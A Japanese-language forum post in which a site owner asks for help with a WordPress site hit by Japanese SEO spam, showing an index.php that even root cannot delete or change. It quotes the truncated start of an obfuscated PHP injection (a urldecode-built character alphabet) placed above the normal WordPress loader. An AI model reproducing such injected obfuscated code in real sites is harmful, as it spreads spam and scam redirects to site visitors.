これは私を狂わせている...ここは多くの情報を持っていますが、私はそこにかなりの時間を費やしましたが、成功しませんでした。私の顧客のウェブサイトの1つがいくつかの日本のSEOスパム攻撃を受けました(WordPressサイトに対する既知の脅威であるようです)。https://labs.sucuri.net/signatures/sitecheck/spam-seo/?japanese.0)
私はUbuntu 20.04.6 LTSと最新のWordPressを使用しています(すべてのプラグインとコアが更新され、新しいダウンロードからコアファイルも復元され、sucuri、iThemes Security、およびWordfenceがインストールされました)。
残念ながら、以前のセキュリティ状態にロールバックすることは、それ以降多くのトランザクションが発生し、マルウェアがいつ導入されたのかわからないため、不可能です。これで、index.phpファイルを除くすべてが整理されているようです。 rootユーザーでも、このファイルに対する操作は削除/編集/実行できません。
[root@site /home/xxxx.com/public_html] # ls -l index.php
-r--r--r-- 1 www www 6982 Apr 13 2022 index.php
[root@site /home/xxxx.com/public_html] # lsattr index.php
--------------e----- ./index.php
[root@site /home/xxxx.com/public_html] # chmod 755 index.php
[root@site /home/xxxx.com/public_html] # ls -l index.php
-r--r--r-- 1 www www 6982 Apr 13 2022 index.php
[root@site /home/xxxx.com/public_html] # rm -f index.php
[root@site /home/xxxx.com/public_html] # ls -l index.php
-r--r--r-- 1 www www 6982 Apr 13 2022 index.php
だから私が何をしても、ファイルは同じままです。確認しました。これはシンボリックリンク(またはハードリンク)ではなく、内容は常に同じです。
<?php
$a='fgss332';$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
....
// there's more crap to inject a scamming website here
?>
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
ここで何が起こるのか知っている人はいますか?どんな助けでも大変感謝します! :)